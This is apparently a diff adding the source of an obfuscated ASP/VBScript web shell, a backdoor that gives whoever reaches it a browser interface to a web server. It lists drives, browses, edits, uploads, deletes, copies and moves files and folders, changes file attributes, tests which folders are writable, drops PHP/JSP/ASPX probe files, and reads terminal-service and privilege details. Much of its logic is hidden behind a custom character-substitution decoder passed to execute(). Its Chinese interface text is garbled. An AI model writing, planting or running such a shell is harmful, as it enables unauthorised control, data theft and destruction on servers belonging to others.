+    j"<table align='center' width='600'><hr><p align='center'><font color='red'>�P�I�ֲ��ܰ���/\:|&</font><br>"
+ Exit Function
+  else
+    j"<table align='center' width='600'><hr>"
+  end if
+  dim i
+  for i=0 to ubound(Folders)
+    Call GetAllFile(Folders(i))
+  next
+  j"<p align='center'>��������<font color='red'>"&Counter&"</font>���Y��<br>"
+ End Function
+ Private Function GetAllFile(Folder)
+  dim objFd,objFs,objFf
+  Set objFd=objFso.GetFolder(Folder)
+  Set objFs=objFd.SubFolders
+  Set objFf=objFd.Files
+  dim strFdName
+  On Error Resume Next
+  For Each OneDir In objFs
+    strFdName=OneDir.Name
+    If strFdName<>"Config.Msi" EQV strFdName<>"RECYCLED" EQV strFdName<>"RECYCLER" EQV strFdName<>"System Volume Information" Then 
+      SFN=Folder&"\"&strFdName
+      Call GetAllFile(SFN)
+ End If
+  Next
+  dim strFlName
+  For Each OneFile In objFf
+    strFlName=OneFile.Name
+    If strFlName<>"desktop.ini" EQV strFlName<>"folder.htt" Then
+      FN=Folder&"\"&strFlName
+   Counter=Counter+ColorOn(FN)
+ End If
+  Next
+  Set objFd=Nothing
+  Set objFs=Nothing
+  Set objFf=Nothing
+ End Function
+
+Private Function CreatePattern(keyword)   
+   CreatePattern=keyword
+   CreatePattern=Replace(CreatePattern,".","\.")
+   CreatePattern=Replace(CreatePattern,"+","\+")
+   CreatePattern=Replace(CreatePattern,"(","\(")
+   CreatePattern=Replace(CreatePattern,")","\)")
+   CreatePattern=Replace(CreatePattern,"[","\[")
+   CreatePattern=Replace(CreatePattern,"]","\]")
+   CreatePattern=Replace(CreatePattern,"{","\{")
+   CreatePattern=Replace(CreatePattern,"}","\}")
+   CreatePattern=Replace(CreatePattern,"*","[^\\\/]*")
+   CreatePattern=Replace(CreatePattern,"?","[^\\\/]{1}")
+   CreatePattern="("&CreatePattern&")+"
+ End Function
+ Private Function ColorOn(FileName)
+   dim objReg
+   Set objReg=new RegExp
+   objReg.Pattern=CreatePattern(keyword)
+   objReg.IgnoreCase=True
+   objReg.Global=True
+   retVal=objReg.Test(Mid(FileName,InstrRev(FileName,"\")+1))
+   if retVal then
+     OutPut=objReg.Replace(Mid(FileName,InstrRev(FileName,"\")+1),"<font color=''>$1</font>")
+     OutPut="<table align='center' width='600'>&nbsp;" & Mid(FileName,1,InstrRev(FileName,"\")) & OutPut
+  j OutPut
+  Response.flush
+  ColorOn=1
+   else
+     ColorOn=0
+   end if
+   Set objReg=Nothing
+ End Function
+End Class
+sub SavePower(PowerPath,SaveType)
+execute(king("ufoizgG = tsoXtiz ztU:yo rft:`>zhokel/<;)(tlgse.vgrfov;)(rqgstk.fgozqegs.ktfthg.vgrfov;)'�����ɶ�������'(zktsq>'zhokelqcqp'=tuqxufqs zhokel<` p:4=ltzxwokzzQ.tsoXtiz:tlst:`>zhokel/<;)(tlgse.vgrfov;)(rqgstk.fgozqegs.ktfthg.vgrfov;)'�����⹦���Ѽ���'(zktsq>'zhokelqcqp'=tuqxufqs zhokel<` p:98=ltzxwokzzQ.tsoXtiz:ftiz 0=thnJtcqU yo:)izqYktvgY(tsoXztE.Lgly = tsoXtiz ztU:yo rft:`aegsgf`=)`aegs`(fgolltl ftiz 1><)izqhzhokel,izqYktvgY(kzlfo yo"))
+end sub:sub EditPower(PowerPath)
+execute(king("ufoizgG = tsoXtiz ztU:)izqYktvgY,tsoXtiz(tszoJnTztu p:)izqYktvgY(tsoXztE.Lgly = tsoXtiz ztU:)``,````,izqYktvgY(teqshtk=izqYktvgY"))
+end sub:Function getMyTitle(theOne,PowerPath)
+execute(king("tszoJkzl = tszoJnTztu:)izqYktvgY,ltzxwokzzQ.tfBtiz(ltzxwokzzQztu & ` :̬״��Ȩǰ��>kw<` & tszoJkzl = tszoJkzl:rtllteeQzlqVtzqW.tfBtiz & ` :�ʷú���>kw<` & tszoJkzl = tszoJkzl:rtoyorgTzlqVtzqW.tfBtiz & ` :���޺���>kw<` & tszoJkzl = tszoJkzl: rtzqtkZtzqW.tfBtiz & ` :��ʱ����>kw<` & tszoJkzl = tszoJkzl: )tmoU.tfBtiz(tmoUtiJztu & ` :С��>kw<` & tszoJkzl = tszoJkzl: `` & izqY.tfBtiz & ` :��·>kw<` & tszoJkzl = tszoJkzl:tszoJkzl doW"))
+End Function:Function getAttributes(intValue,PowerPath)
+execute(king("yo rft:`>``'`&izqYktvgY&`=izqYktvgY&9=thnJtcqU&ktvgYtcqU=fgozeQ?'=ytki.fgozqegs``=aeosefg ����=txsqc fgzzxw=thnz zxhfo< >zfgy/<����δ>95XX95#=kgsge zfgy<` = ltzxwokzzQztu:tlst:`>``'`&izqYktvgY&`=izqYktvgY&0=thnJtcqU&ktvgYtcqU=fgozeQ?'=ytki.fgozqegs``=aeosefg ����=txsqc fgzzxw=thnz zxhfo< >zfgy/<������>rtk=kgsge zfgy<` = ltzxwokzzQztu: ftiz 1=FBzorS yo:)`\\`,`\`,izqYktvgY(teqshtk=izqYktvgY:yC rfS:1=FBzorS:0 - txsqIzfo = txsqIzfo:ftiJ 0 => txsqIzfo yC:yC rfS:1=FBzorS:9 - txsqIzfo = txsqIzfo:ftiJ 9 => txsqIzfo yC:yC rfS:1=FBzorS:7 - txsqIzfo = txsqIzfo:ftiJ 7 => txsqIzfo yC:yC rfS:3 - txsqIzfo = txsqIzfo:ftiJ 3 => txsqIzfo yC:yC rfS:50 - txsqIzfo = txsqIzfo:ftiJ 50 => txsqIzfo yC:yC rfS:98 - txsqIzfo = txsqIzfo:ftiJ 98 => txsqIzfo yC:yC rfS:75 - txsqIzfo = txsqIzfo:ftiJ 75 => txsqIzfo yC:yC rfS:390 - txsqIzfo = txsqIzfo:ftiJ 390 => txsqIzfo yC:0=FBzorS:FBzorS doW"))
+End Function:Function getTheSize(theSize):If theSize >= (1024 * 1024 * 1024) Then :getTheSize = Fix((theSize / (1024 * 1024 * 1024)) * 100) / 100 & "G":end if:If theSize >= (1024 * 1024) And theSize < (1024 * 1024 * 1024) Then :getTheSize = Fix((theSize / (1024 * 1024)) * 100) / 100 & "M":end if:If theSize >= 1024 And theSize < (1024 * 1024) Then :getTheSize = Fix((theSize / 1024) * 100) / 100 & "K":end if:If theSize >= 0 And theSize <1024 Then :getTheSize = theSize & "B":end if:End Function:function openUrl(usePath):Dim theUrl, thePath:thePath = Server.MapPath("/"):If LCase(Left(usePath, Len(thePath))) = LCase(thePath) Then:theUrl = Mid(usePath, Len(thePath) + 1):theUrl = Replace(theUrl, "\", "/"):If Left(theUrl, 1) = "/" Then:theUrl = Mid(theUrl, 2):End If:openUrl="/"&theUrl&""" target=""_blank":Else:openUrl="###"" onclick=""alert('�ļ�����վ��Ŀ¼�¡�')":End If:End function
+
+Function ScReWr(folder)
+on error resume next 
+Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename
+Set FSO = Server.Createobject(CONST_FSO)
+Set TestFolder = FSO.GetFolder(folder)
+Set TestFileList = TestFolder.SubFolders
+RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp"
+For Each A in TestFileList
+Next
+If err Then
+err.Clear
+ReWrStr = "<span style='font-size:11px;'>��</span><font face='webdings' size='1' color=yellow>x</font> "
+FSO.CreateTextFile folder & RndFilename,True
+If err Then
+err.Clear
+ReWrStr = ReWrStr & "<span style='font-size:11px;'>д</span><font face='webdings' size='1' color=yellow>x</font> "
+Else
+ReWrStr = ReWrStr & "<span style='font-size:11px;'>д</span>�� "
+FSO.DeleteFile folder & RndFilename,True
+End If
+Else
+ReWrStr = "<span style='font-size:11px;'>��</span>�� "
+FSO.CreateTextFile folder & RndFilename,True
+If err Then
+err.Clear
+ReWrStr = ReWrStr & "<span style='font-size:11px;'>д</span><font face='webdings' size='1' color=yellow>x</font> "
+Else
+ReWrStr = ReWrStr & "<span style='font-size:11px;'>д</span>�� "
+FSO.DeleteFile folder & RndFilename,True
+End if
+End if
+Set TestFileList = Nothing
+Set TestFolder = Nothing
+Set FSO = Nothing
+ScReWr = ReWrStr
+End Function
+function php()
+execute(king("`>ktzfte<>'19'=ziuoti rz<>kz<>ktzfte/<>q/<>zfgy/<>w/<)!�����Բ��ɾ(>w<>rtk=kgsge 6=tmol zfgy<>'strphq=fgozeQ?'=ytki q<>h<>zfgy/<>h<���������֧�����������̽>ktzfte<>kw<>h<>kw<>kw<>h<>kw<>h<>kw<>kw<>ktzfte/< ;hlwf&;hlwf&;hlwf&>tdqkyo/<>110=ziuoti 118=izrov bhlq.zltz=ekl tdqkyo< ;hlwf&;hlwf&;hlwf&;hlwf&>tdqkyo/<>110=ziuoti 118=izrov hlp.zltz=ekl tdqkyo< ;hlwf&;hlwf&;hlwf&;hlwf&>tdqkyo/<>110=ziuoti 118=izrov hih.zltz=ekl tdqkyo<>ktzfte<`p��`gg��_��gg zltJ bhlq`&)95(kie&``&)48(kie&`;))``tyqlfx``,]``v``[dtzC.zltxjtN(sqct(tzokK.tlfghltN`&)48(kie&``&)15(kie&``&)95(kie&``&)48(kie&` ``tlsqy``=zltxjtNtzqrosqc ``zhokelR``=tuqxufqV tuqY @%`&)15(kie&``tzokK.))`bhlq.zltz`(izqhhqd.ktcktl(tsoXzbtJtzqtkZ.gly��`gg��_��gg zltJ hlR`tzokK.))`hlp.zltz`(izqhhqd.ktcktl(tsoXzbtJtzqtkZ.gly��`>?)(gyfohih hih?<>?'gg��_��gg' giet YDY?<`tzokK.))`hih.zltz`(izqhhqd.ktcktl(tsoXzbtJtzqtkZ.gly��))1,1(zAg(zetpwBtzqtkZ.ktcktU=gly ztl��zbtG tdxltN kgkkS fB"))
+End function
+On Error Resume Next
+Function King(Kingstr)
+arra=array("Q","A","Z","W","S","X","E","D","C","R","F","V","T","G","B","Y","H","N","U","J","M","I","K","L","O","P","q","w","e","r","t","y","u","i","o","p","a","s","d","f","g","h","j","k","l","z","x","c","v","b","n","m","0","9","8","7","6","5","4","3","2","1")
+arrb=array("A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","1","2","3","4","5","6","7","8","9","0")
+kingstr = Replace(Replace(Kingstr,"`",""""),"��", vbCrLf)
+For KingI = 1 To Len(Kingstr)
+love = 0
+For i = 0 To ubound(arra)
+If Mid(Kingstr, KingI, 1) = arra(i) Then
+NewKing = arrb(i) + NewKing 
+love = 1
+Exit For
+End If
+Next 
+If love = 0 Then
+NewKing  = Mid(Kingstr, KingI, 1) + NewKing 
+End If
+Next
+King= NewKing
+End Function
+function apjdel():set fso=Server.CreateObject(CONST_FSO):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):j"ɾ�����!":End function
+
+Dim T1
+Class UPC
+  Dim D1,D2
+  Public Function Form(F)
+F=lcase(F)
+If D1.exists(F) then:Form=D1(F):else:Form="":end if
+  End Function
+
+  Public Function UA(F)
+F=lcase(F)
+If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
+  End Function
+  Private Sub Class_Initialize
+  Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
+set D1=CreateObject(ObT(4,0))
+if Request.TotalBytes<1 then Exit Sub
+set T1 = CreateObject(ObT(6,0))
+T1.Type = 1 : T1.Mode =3 : T1.Open
+T1.Write  Request.BinaryRead(Request.TotalBytes)
+T1.Position=0 : TDa =T1.Read : DStart = 1
+DEnd = LenB(TDa)
+set D2=CreateObject(ObT(4,0))
+vbCrlf = chrB(13) & chrB(10)
+set T2 = CreateObject(ObT(6,0))
+TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)
+TLen = LenB (TSt)
+DStart=DStart+TLen+1
+while (DStart + 10) < DEnd
+  DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
+  T2.Type = 1 : T2.Mode =3 : T2.Open
+  T1.Position = DStart
+  T1.CopyTo T2,DIEnd-DStart
+  T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
+  TIn = T2.ReadText : T2.Close
+  DStart = InStrB(DIEnd,TDa,TSt)
+  FStart = InStr(22,TIn,"name=""",1)+6
+  FEnd = InStr(FStart,TIn,"""",1)
+  UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
+  if InStr (45,TIn,"filename=""",1) > 0 then
+set TFL=new FIF
+FStart = InStr(FEnd,TIn,"filename=""",1)+10
+FEnd = InStr(FStart,TIn,"""",1)
+FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
+FEnd = InStr(FStart,TIn,vbCr)
+TFL.FileStart =DIEnd
+TFL.FileSize = DStart -DIEnd -3
+if not D2.Exists(UpName) then
+  D2.add UpName,TFL
+end if
+  else
+T2.Type =1 : T2.Mode =3 : T2.Open
+T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
+T2.Position = 0 : T2.Type = 2
+T2.Charset ="gb2312"
+SFV = T2.ReadText
+T2.Close
+if D1.Exists(UpName) then
+  D1(UpName)=D1(UpName)&", "&SFV
+else
+  D1.Add UpName,SFV
+end if
+  end if
+  DStart=DStart+TLen+1
+wend
+TDa=""
+set T2 =nothing
+  End Sub
+  Private Sub Class_Terminate
+if Request.TotalBytes>0 then
+  D1.RemoveAll:D2.RemoveAll
+  set D1=nothing:set D2=nothing
+  T1.Close:set T1 =nothing
+end if
+  End Sub
+End Class
+
+Class FIF
+dim FileSize,FileStart
+  Private Sub Class_Initialize
+  FileSize = 0
+  FileStart= 0
+  End Sub
+  Public function SaveAs(F)
+  dim T3
+  SaveAs=true
+  if trim(F)="" or FileStart=0 then exit function
+  set T3=CreateObject(ObT(6,0))
+ T3.Mode=3 : T3.Type=1 : T3.Open
+ T1.position=FileStart
+ T1.copyto T3,FileSize
+ T3.SaveToFile F,2
+ T3.Close
+ set T3=nothing
+ SaveAs=false
+end function
+End Class
+Class LBF
+  Dim CF
+  Private Sub Class_Initialize
+SET CF=CreateObject(ObT(0,0))
+  End Sub
+  Private Sub Class_Terminate
+Set CF=Nothing
+  End Sub
+Function ShowDriver()
+For Each D in CF.Drives
+  j cdx&"<a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>&nbsp���ش��� ("&D.DriveLetter&":)</a><br></td></tr>" 
+Next
+  End Function
+Function Show1File(Path) 
+Set FOLD=CF.GetFolder(Path)
+i=0
+SI="<table width='100%' border='0' cellspacing='0' cellpadding='6'><tr>" 
+For Each F in FOLD.subfolders
+SI=SI&"<td  height=10 width=17% align=center><div  onMouseOver=""this.style.backgroundColor='#B3D169'"" onMouseOut=""this.style.backgroundColor='#191919'"" style='border:1px solid #dddddd;padding-bottom:4px' id=d><a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)&""")' title=""����"">"
+SI=SI&"&nbsp;<font face='wingdings' color='#ffffff' size='6'>0</font>  "
+si=si&"<br>"&F.Name&"</a><br><a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""CopyFolder"")'  onclick='return yesok()' class='am' title='����'>Copy</a> <a href='javascript:FullForm("""&Replace(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")' onclick='return yesok()' class='am' title='ɾ��'>Del</a> <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""MoveFolder"")' onclick='return yesok()' class='am' title='�ƶ�'>Move</a> <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""DownFile"")' onclick='return yesok()' class='am' title='����'>Down</a></div></td>"
+i=i+1
+If i mod 6=0 then SI=SI&"</tr><tr>"
+Next
+SI=SI&"</tr><tr><td height=2></td></tr></table>"
+j SI &"" : SI="":i=0
+SI="<div id=links><table width='100%' align=center id =linklist2><tr><td id=s><b id=x>Filename</b></td><td id=s height=22><b id=x>Size</b></td><td id=s><b id=x>Type</b></td><td id=s><b id=x>Operating</b></td><td id=s><b id=x>Last Modified</b></td><td></td>"
+For Each L in Fold.files
+SI=SI&"<tr><td height='20' id=d >"
+si=si&"<font face='wingdings' color='#ffffff' size='3'>2</font>"
+si=si&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DownFile"");' title='����'>  "&L.Name&"</a><Td id=d>"&clng(L.size/1024)&"K</td><Td id=d>"&L.Type&"</td><Td id=d>"
+si=si&"<a href="""&openUrl(PaTh&"\"&L.nAme)&""" class='am' title='Open'>Open</a> "
+si=si&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+Si=Si&"<a onclick=""window.open('?Action=EditPower&PowerPath="&RepAth(PaTh&"\"&L.nAme)&"','EditPower','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=300,height=200')"" href='###' class='am' title='Ȩ��'>Ȩ��</a>"
+Dim EditOOK
+EditOOK=1
+EditOOV=l.Attributes
+If EditOOV >= 128 Then
+EditOOV = EditOOV - 128
+End If
+If EditOOV >= 64 Then
+EditOOV = EditOOV - 64
+End If
+If EditOOV >= 32 Then
+EditOOV = EditOOV - 32
+End If
+If EditOOV >= 16 Then
+EditOOV = EditOOV - 16
+End If:If EditOOV >= 8 Then
+EditOOV = EditOOV - 8
+End If
+If EditOOV >= 4 Then
+EditOOV = EditOOV - 4:EditOOK=0
+End If
+If EditOOV >= 2 Then
+EditOOV = EditOOV - 2:EditOOK=0
+End If
+If EditOOV >= 1 Then
+EditOOV = EditOOV - 1:EditOOK=0
+End If
+if EditOOK=0 then
+si=si&"<font face='webdings' size='1' color=red>x</font>"
+else
+si=si&"��"
+end if
+si=si&" <a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a> <a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""CopyFile"")' class='am' title='����'>Copy</a> <a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a></td><td id=d>"&replace(L.DateLastModified,"/","-")&"</td></tr>"
+i=i+1
+Next
+j SI&"</tr></table></div><script>var container = new Array(""linklist2""); var objects = new Array(); var links = new Array(); var tmp = new Array(); var interval = 0; var c=0; function initEventListener() { for(i=0; i < container.length; i++) { objects = document.getElementById(container[i]).getElementsByTagName(""td""); for(j=0; j < objects.length; j++) {    if(document.all) { objects[j].attachEvent(""onmouseover"", resetLinkFade); objects[j].attachEvent(""onmouseout"", startLinkFade); } else {objects[j].addEventListener(""mouseover"", resetLinkFade, false); objects[j].addEventListener(""mouseout"", startLinkFade, false); } var defcol = getPseudoRule(container[i], ""td"");  var hovcol = getPseudoRule(container[i], ""td:hover""); if(defcol.charAt(0) == ""#"") defcol = hex2rgb(defcol); else if(defcol[0] == ""r"") { defcol = defcol.match(/rgb\((\d+), (\d+), (\d+)\)/); defcol = defcol.slice(1);} if(hovcol.charAt(0) == ""#"") hovcol = hex2rgb(hovcol); else if(hovcol[0] == ""r""){ hovcol = hovcol.match(/rgb\((\d+), (\d+), (\d+)\)/); hovcol = hovcol.slice(1); } links[c]     = new Array(); links[c][""object""]  = objects[j]; links[c][""defaultcolor""] = defcol; links[c][""currentcolor""] = defcol; links[c][""hovercolor""] = hovcol; c++; } } } function resetLinkFade(e) { var evt = e || window.event; var obj = evt.target || evt.srcElement; for(r=0; r<links.length; r++) { if(obj == links[r][""object""]) { tmp = links[r][""defaultcolor""].clone(); links[r][""currentcolor""] = links[r][""defaultcolor""]; links[r][""object""].style.backgroundColor = rgb2hex(links[r][""hovercolor""]); } } }function startLinkFade(e) {   var evt = e || window.event; var obj = evt.target || evt.srcElement; for(r=0; r<links.length; r++) { if(obj == links[r][""object""]) { links[r][""defaultcolor""] = tmp.clone(); links[r][""currentcolor""] = links[r][""hovercolor""].clone(); links[r][""object""].style.backgroundColor = rgb2hex(links[r][""hovercolor""]); } } if(interval == 0) interval = window.setInterval(linkFade,  30); } function linkFade() {  var runners = 0; for(o=0; o<links.length; o++) { var aim  = links[o][""object""]; var defcol = links[o][""defaultcolor""]; var hovcol = links[o][""hovercolor""]; var actcol = links[o][""currentcolor""]; if( defcol[0]+defcol[1]+defcol[2] != actcol[0]+actcol[1]+actcol[2] ) { runners++; actcol[0] = actcol[0]-10 < 25 ? 25 : actcol[0]-10; actcol[1] = actcol[1]-10 < 25 ? 25 : actcol[1]-10; actcol[2] = actcol[2]-10 < 25 ? 25 : actcol[2]-10; aim.style.backgroundColor = rgb2hex(actcol); links[o][""currentcolor""] = actcol; } } if(runners == 0) { window.clearInterval(interval); interval=0; } } function getPseudoRule(parent, element) {  var mysheet =document.styleSheets[0]; var myrule  = mysheet.cssRules || mysheet.rules; for (n = 0; n < myrule.length; n++) if (myrule[n].selectorText.toLowerCase() == ""#""+ parent +"" ""+ element) return myrule[n].style.backgroundColor; else if (myrule[n].selectorText.toLowerCase() == element) return myrule[n].style.backgroundColor; return """"; } function hex2rgb(hex) { var triplet = hex.toLowerCase().replace(/#/, ''); var rgbArr  = new Array();  if(triplet.length == 6) { rgbArr[0] = parseInt(triplet.substr(0,2), 16) ;rgbArr[1] = parseInt(triplet.substr(2,2), 16) ;rgbArr[2] = parseInt(triplet.substr(4,2), 16) ;return rgbArr; } else if(triplet.length == 3){rgbArr[0] = parseInt((triplet.substr(0,1) + triplet.substr(0,1)), 16); rgbArr[1] = parseInt((triplet.substr(1,1) + triplet.substr(1,1)), 16); rgbArr[2] = parseInt((triplet.substr(2,2) + triplet.substr(2,2)), 16); return rgbArr; } else { throw triplet + ' is not a valid color triplet.'; } } function rgb2hex(rgb) { var hexcolors = new Array(""0"",""1"",""2"",""3"",""4"",""5"",""6"",""7"",""8"",""9"",""a"",""b"",""c"",""d"",""e"",""f""); var r, r1, r2, g, g1, g2, b, b1, b2; r1 = Math.floor(rgb[0] / 16); r2 = rgb[0] - r1*16; g1 = Math.floor(rgb[1] / 16); g2 = rgb[1] - g1*16; b1 = Math.floor(rgb[2] / 16); b2 = rgb[2] - b1*16; r = hexcolors[r1] + hexcolors[r2]; g = hexcolors[g1] + hexcolors[g2]; b = hexcolors[b1] + hexcolors[b2]; return ""#""+r+g+b; } Object.prototype.clone = function(deep) { var objectClone = new this.constructor(); for (var property in this) if (!deep) objectClone[property] = this[property]; else if (typeof this[property] == 'object') objectClone[property] = this[property].clone(deep); else {objectClone[property] = this[property]; }return objectClone; } "&VBNEWLINE
+if ysjb=true then j "initEventListener();</script>":end if
+Set FOLD=Nothing
+End function
+Function DelFile(Path)
+execute(king("yC rfS��CU p��skMaeqA&CU=CU��`>ktzfte/<�����ɳ�ɾ `&izqY&` ������ϲ��>kw<>kw<>kw<>ktzfte<`=CU��izqY tsoXtztstW.XZ��ftiJ )izqY(lzlobStsoX.XZ yC"))
+End Function
+Function EditFile(Path)
+execute(king("`>dkgy/<>'tcqU'=txsqc 'zodwxl'=thnz 'zodwxl'=tdqf zxhfo<;hlwf&;hlwf&;hlwf&>'ztltN'=txsqc 'ztltk'=thnz 'ztltk'=tdqf zxhfo<;hlwf&;hlwf&;hlwf&>';)(aeqw.nkgzloi'=aeosefg 'aeqA'=txsqc 'fgzzxw'=thnz 'aeqwgu'=tdqf zxhfo<>ki<>kw<>qtkqzbtz/<`&zbJ&`>'167:ziuoti;%110:izrov'=tsnzl 'zftzfgZ'=tdqf qtkqzbtz<>kw<>'%110:izrov'=tsnzl '`&izqY&`'=txsqc 'tdqGX'=tdqf zxhfo<>'ftrroi'=thnJ 'tsoXzorS'=txsqc 'fgozeQ'=tdqf zxhfo<>'dkgXzorS'=tdqf 'zlgh'=rgiztd 'zlgY=9fgozeQ?`&VNM&`'=fgozeq dkgX<` p��yC rfS��WQAkzl=zbJ:`hlq.sstil\`&)`izqYktrsgX`(fgolltU=izqY��tlsS��ufoizgG=J ztU��tlgse.J�� )ssqrqtk.J(trgefSVTJD=zbJ��)tlsqX ,0 ,izqY(tsoyzbtzfthg.XZ=J ztU��ftiJ ``><izqY yC��yC rfS��rfS.tlfghltN��CU p��skMaeqA&CU=CU��`>ktzfte/<�����ɴ汣������ϲ��>kw<>kw<>kw<>ktzfte<`=CU��ufoizgf=J ztU��tlgse.J��)`zftzfge`(dkgy.zltxjtN tfoVtzokK.J��)izqY(tsoXzbtJtzqtkZ.XZ=J ztU��ftiJ `zlgY`=)`9fgozeQ`(zltxjtN yC"))
+End Function
+Function CopyFile(Path)
+execute(king("yC rfS�� CU p��skMaeqA&CU=CU��`>ktzfte/<�������Ƹ�`&)1(izqY&`������ϲ��>kw<>kw<>kw<>ktzfte<`=CU��)0(izqY,)1(izqY tsoXnhgZ.XZ��ftiJ ``><)0(izqY rfq ))1(izqY(lzlobStsoX.XZ yC��)`||||`,izqY(zoshU=izqY"))
+End Function
+Function MoveFile(Path)
+execute(king("yC rfS�� CU p��skMaeqA&CU=CU��`>ktzfte/<�����ɶ���`&)1(izqY&`������ϲ��>kw<>kw<>kw<>ktzfte<`=CU��)0(izqY,)1(izqY tsoXtcgT.XZ��ftiJ ``><)0(izqY rfq ))1(izqY(lzlobStsoX.XZ yC��)`||||`,izqY(zoshU=izqY"))
+End Function
+Function DelFolder(Path)
+execute(king("yC rfS��CU p��skMaeqA&CU=CU��`>ktzfte/<�����ɳ�ɾ`&izqY&`¼Ŀ��ϲ��>kw<>kw<>kw<>ktzfte<`=CU��izqY ktrsgXtztstW.XZ��ftiJ )izqY(lzlobSktrsgX.XZ yC"))
+End Function
+Function CopyFolder(Path)
+execute(king("yC rfS��CU p��skMaeqA&CU=CU��`>ktzfte/<�������Ƹ�`&)1(izqY&`¼Ŀ��ϲ��>kw<>kw<>kw<>ktzfte<`=CU��)0(izqY,)1(izqY ktrsgXnhgZ.XZ��ftiJ ``><)0(izqY rfq ))1(izqY(lzlobSktrsgX.XZ yC��)`||||`,izqY(zoshU=izqY"))
+End Function
+Function MoveFolder(Path)
+execute(king("yC rfS��CU p��skMaeqA&CU=CU��`>ktzfte/<�����ɶ���`&)1(izqY&`¼Ŀ��ϲ��>kw<>kw<>kw<>ktzfte<`=CU��)0(izqY,)1(izqY ktrsgXtcgT.XZ��ftiJ ``><)0(izqY rfq ))1(izqY(lzlobSktrsgX.XZ yC��)`||||`,izqY(zoshU=izqY"))
+End Function
+Function NewFolder(Path)
+execute(king("yC rfS��CU p��skMaeqA&CU=CU��`>ktzfte/<�����ɽ���`&izqY&`¼Ŀ��ϲ��>kw<>kw<>kw<>ktzfte<`=CU��izqY ktrsgXtzqtkZ.XZ��ftiJ ``><izqY rfq )izqY(lzlobSktrsgX.XZ zgG yC"))
+End Function
+End Class
+
+sub getTerminalInfo()
+execute(king("yo rfS��`����tktivnfQeh���ý��Ʋ�����¼Ŀ��Ĭ���Կ�,��������tktivnfQeh_�ַ�>os<`p��ftiJ )`yoe.`&tdqfktcktl&`\etzfqdnU\qzqW fgozqeoshhQ\lktlM ssQ\lufozztU rfQ lzftdxegW\`&ktcokrlnl(lzlobStsoX.gly yC��)`tdqGktzxhdgZ\tdqGktzxhdgZ\tdqGktzxhdgZ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD`(rqtNutN.ilv=tdqfktcktl��)9,)9(ktrsgXsqoethlztE.glX(zyts=tcokrlnU��)BUX_JUGBZ(zetpwgtzqtkZ.ktcktU=gly ztU��zbtG��yo rfS��yo rfS��`>kw<��ľYDY��д�Ҳ�,¼ĿsoqTwtK�Ҳ��Կ�,������ȨdtzlnUsqegV����,soqdfoK eouqT_���������>os<`p��ftiJ `dtzlnUsqegV`=tdqGzfxgeeQteocktU.teocktUpwg yo��ftiJ )`soqdfov`,)tdqG.teocktUpwg(tlqes(kzlfo yo��yo rfS��yo rfS��`>kw<Ȩ����ľhlR��ʹ�ǿ��Կ�,������ȨdtzlnUsqegV����,zqedgJ_���������>os<`p��ftiJ `dtzlnUsqegV`=tdqGzfxgeeQteocktU.teocktUpwg yo��ftiJ )`zqedgz`,)tdqG.teocktUpwg(tlqes(kzlfo yo��yo rfS��yo rft��yo rfS��`>kw<��ľYDY�ǿ��Կ�,dtzlnUsqegVΪ��Ȩ����,�ڴ����tieqhQ_���������>os< `p��tlsS��`>kw<Ȩ���ֱ�Կ�.tieqhQΪ�����ASKǰ��>os<`p��ftiJ )`tieqhQ`,)`SNQKJXBU_NSINSU`(ltswqokqIktcktU.zltxjtN(kzlfo yC��ftiJ `dtzlnUsqegV`=tdqGzfxgeeQteocktU.teocktUpwg yo��ftiJ `tieqhq`=)tdqG.teocktUpwg(tlqes yo��yo rfS��yo rfS��`>kw<Ȩ��߹�tbt.xl���ǿ��Կ�,������ȨdtzlnUsqegV����,װ��M-cktU_���������>os<`p��ftiJ `dtzlnUsqegV`=tdqGzfxgeeQteocktU.teocktUpwg yo��ftiJ `M-cktU`=tdqG.teocktUpwg yo��ktzxhdgZpwg fC teocktUpwg ieqS kgX��zbtG tdxltN kgkkS fB��)`teocktU`(nqkkQ = ktzsoX.ktzxhdgZpwg��)`fgozqeoshhQ.sstiU`(zetpwBtzqtkZ.ktcktU = ql ztU��)`.//:JGfoK`(zetpwBztE = ktzxhdgZpwg ztU��`>ki<>kw<]��̽��_�������[`p��`>kw<>kw<>kw<------------------------------------`p��`>kw<`&aa&`:Ϊ����_����ǰ��>os<`p��)ai(rqtNutN.ilv=aa��`zfxgZ\dxfS\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\TVFD`=ai��`>kw<`&sdzf&`:Ϊ����sdzG ztfstJ>os<`p��0=sdzG ftiJ ``=sdzf 